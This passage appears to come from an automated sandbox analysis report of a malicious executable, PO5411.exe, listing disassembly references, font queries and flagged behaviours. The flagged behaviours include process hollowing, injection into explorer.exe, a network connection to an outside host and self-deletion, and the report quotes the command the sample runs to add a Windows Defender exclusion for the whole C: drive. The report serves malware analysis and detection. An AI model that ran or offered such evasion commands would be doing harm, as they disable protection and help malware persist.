                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01212D8A mov eax, dword ptr fs:[00000030h]17_2_01212D8A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01212D8A mov eax, dword ptr fs:[00000030h]17_2_01212D8A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01212D8A mov eax, dword ptr fs:[00000030h]17_2_01212D8A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124FD9B mov eax, dword ptr fs:[00000030h]17_2_0124FD9B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124FD9B mov eax, dword ptr fs:[00000030h]17_2_0124FD9B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122D5E0 mov eax, dword ptr fs:[00000030h]17_2_0122D5E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122D5E0 mov eax, dword ptr fs:[00000030h]17_2_0122D5E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DFDE2 mov eax, dword ptr fs:[00000030h]17_2_012DFDE2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DFDE2 mov eax, dword ptr fs:[00000030h]17_2_012DFDE2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DFDE2 mov eax, dword ptr fs:[00000030h]17_2_012DFDE2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DFDE2 mov eax, dword ptr fs:[00000030h]17_2_012DFDE2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012C8DF1 mov eax, dword ptr fs:[00000030h]17_2_012C8DF1
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296DC9 mov eax, dword ptr fs:[00000030h]17_2_01296DC9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296DC9 mov eax, dword ptr fs:[00000030h]17_2_01296DC9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296DC9 mov eax, dword ptr fs:[00000030h]17_2_01296DC9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296DC9 mov ecx, dword ptr fs:[00000030h]17_2_01296DC9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296DC9 mov eax, dword ptr fs:[00000030h]17_2_01296DC9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296DC9 mov eax, dword ptr fs:[00000030h]17_2_01296DC9
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124BC2C mov eax, dword ptr fs:[00000030h]17_2_0124BC2C
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E740D mov eax, dword ptr fs:[00000030h]17_2_012E740D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E740D mov eax, dword ptr fs:[00000030h]17_2_012E740D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E740D mov eax, dword ptr fs:[00000030h]17_2_012E740D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296C0A mov eax, dword ptr fs:[00000030h]17_2_01296C0A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296C0A mov eax, dword ptr fs:[00000030h]17_2_01296C0A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296C0A mov eax, dword ptr fs:[00000030h]17_2_01296C0A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296C0A mov eax, dword ptr fs:[00000030h]17_2_01296C0A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1C06 mov eax, dword ptr fs:[00000030h]17_2_012D1C06
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123746D mov eax, dword ptr fs:[00000030h]17_2_0123746D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124A44B mov eax, dword ptr fs:[00000030h]17_2_0124A44B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AC450 mov eax, dword ptr fs:[00000030h]17_2_012AC450
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AC450 mov eax, dword ptr fs:[00000030h]17_2_012AC450
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122849B mov eax, dword ptr fs:[00000030h]17_2_0122849B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D14FB mov eax, dword ptr fs:[00000030h]17_2_012D14FB
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296CF0 mov eax, dword ptr fs:[00000030h]17_2_01296CF0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296CF0 mov eax, dword ptr fs:[00000030h]17_2_01296CF0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01296CF0 mov eax, dword ptr fs:[00000030h]17_2_01296CF0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E8CD6 mov eax, dword ptr fs:[00000030h]17_2_012E8CD6
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01214F2E mov eax, dword ptr fs:[00000030h]17_2_01214F2E
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01214F2E mov eax, dword ptr fs:[00000030h]17_2_01214F2E
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124E730 mov eax, dword ptr fs:[00000030h]17_2_0124E730
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E070D mov eax, dword ptr fs:[00000030h]17_2_012E070D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E070D mov eax, dword ptr fs:[00000030h]17_2_012E070D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124A70E mov eax, dword ptr fs:[00000030h]17_2_0124A70E
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124A70E mov eax, dword ptr fs:[00000030h]17_2_0124A70E
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123F716 mov eax, dword ptr fs:[00000030h]17_2_0123F716
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AFF10 mov eax, dword ptr fs:[00000030h]17_2_012AFF10
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AFF10 mov eax, dword ptr fs:[00000030h]17_2_012AFF10
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122FF60 mov eax, dword ptr fs:[00000030h]17_2_0122FF60
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E8F6A mov eax, dword ptr fs:[00000030h]17_2_012E8F6A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122EF40 mov eax, dword ptr fs:[00000030h]17_2_0122EF40
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01228794 mov eax, dword ptr fs:[00000030h]17_2_01228794
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297794 mov eax, dword ptr fs:[00000030h]17_2_01297794
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297794 mov eax, dword ptr fs:[00000030h]17_2_01297794
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297794 mov eax, dword ptr fs:[00000030h]17_2_01297794
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012537F5 mov eax, dword ptr fs:[00000030h]17_2_012537F5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121E620 mov eax, dword ptr fs:[00000030h]17_2_0121E620
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012CFE3F mov eax, dword ptr fs:[00000030h]17_2_012CFE3F
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121C600 mov eax, dword ptr fs:[00000030h]17_2_0121C600
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121C600 mov eax, dword ptr fs:[00000030h]17_2_0121C600
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121C600 mov eax, dword ptr fs:[00000030h]17_2_0121C600
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01248E00 mov eax, dword ptr fs:[00000030h]17_2_01248E00
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D1608 mov eax, dword ptr fs:[00000030h]17_2_012D1608
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124A61C mov eax, dword ptr fs:[00000030h]17_2_0124A61C
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124A61C mov eax, dword ptr fs:[00000030h]17_2_0124A61C
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122766D mov eax, dword ptr fs:[00000030h]17_2_0122766D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123AE73 mov eax, dword ptr fs:[00000030h]17_2_0123AE73
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123AE73 mov eax, dword ptr fs:[00000030h]17_2_0123AE73
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123AE73 mov eax, dword ptr fs:[00000030h]17_2_0123AE73
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123AE73 mov eax, dword ptr fs:[00000030h]17_2_0123AE73
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123AE73 mov eax, dword ptr fs:[00000030h]17_2_0123AE73
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01227E41 mov eax, dword ptr fs:[00000030h]17_2_01227E41
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01227E41 mov eax, dword ptr fs:[00000030h]17_2_01227E41
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01227E41 mov eax, dword ptr fs:[00000030h]17_2_01227E41
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01227E41 mov eax, dword ptr fs:[00000030h]17_2_01227E41
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01227E41 mov eax, dword ptr fs:[00000030h]17_2_01227E41
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01227E41 mov eax, dword ptr fs:[00000030h]17_2_01227E41
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DAE44 mov eax, dword ptr fs:[00000030h]17_2_012DAE44
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DAE44 mov eax, dword ptr fs:[00000030h]17_2_012DAE44
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E0EA5 mov eax, dword ptr fs:[00000030h]17_2_012E0EA5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E0EA5 mov eax, dword ptr fs:[00000030h]17_2_012E0EA5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E0EA5 mov eax, dword ptr fs:[00000030h]17_2_012E0EA5
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012946A7 mov eax, dword ptr fs:[00000030h]17_2_012946A7
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012AFE87 mov eax, dword ptr fs:[00000030h]17_2_012AFE87
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012276E2 mov eax, dword ptr fs:[00000030h]17_2_012276E2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012416E0 mov ecx, dword ptr fs:[00000030h]17_2_012416E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01258EC7 mov eax, dword ptr fs:[00000030h]17_2_01258EC7
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012436CC mov eax, dword ptr fs:[00000030h]17_2_012436CC
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012CFEC0 mov eax, dword ptr fs:[00000030h]17_2_012CFEC0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E8ED6 mov eax, dword ptr fs:[00000030h]17_2_012E8ED6
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011FB5E0 mov eax, dword ptr fs:[00000030h]21_2_011FB5E0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F1914 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,21_2_011F1914
                      Source: C:\Users\user\Desktop\PO5411.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_011E6FE3
                      Source: C:\Users\user\Desktop\PO5411.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.21.198 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: www.movementinspires.com
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\Jump to behavior
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\PO5411.exeMemory allocated: C:\Users\user\AppData\Local\Temp\PO5411.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\PO5411.exeMemory written: C:\Users\user\AppData\Local\Temp\PO5411.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeThread register set: target process: 3424Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3424Jump to behavior
                      Queues an APC in another process (thread injection)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                      Sample uses process hollowing techniqueShow sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000Jump to behavior
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\PO5411.exeMemory written: C:\Users\user\AppData\Local\Temp\PO5411.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeMemory written: C:\Users\user\AppData\Local\Temp\PO5411.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeMemory written: C:\Users\user\AppData\Local\Temp\PO5411.exe base: B20008Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Users\user\AppData\Local\Temp\PO5411.exe C:\Users\user\AppData\Local\Temp\PO5411.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\PO5411.exe'Jump to behavior
                      Source: explorer.exe, 00000012.00000002.912454328.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: explorer.exe, 00000012.00000002.913157186.0000000001080000.00000002.00000001.sdmp, cmd.exe, 00000015.00000002.915402659.0000000005D20000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000012.00000002.926019413.0000000005E50000.00000004.00000001.sdmp, cmd.exe, 00000015.00000002.915402659.0000000005D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000012.00000002.913157186.0000000001080000.00000002.00000001.sdmp, cmd.exe, 00000015.00000002.915402659.0000000005D20000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000012.00000002.913157186.0000000001080000.00000002.00000001.sdmp, cmd.exe, 00000015.00000002.915402659.0000000005D20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000012.00000000.823701221.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,21_2_011E3F80
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,21_2_011D96A0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,21_2_011D5AEF
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Users\user\Desktop\PO5411.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
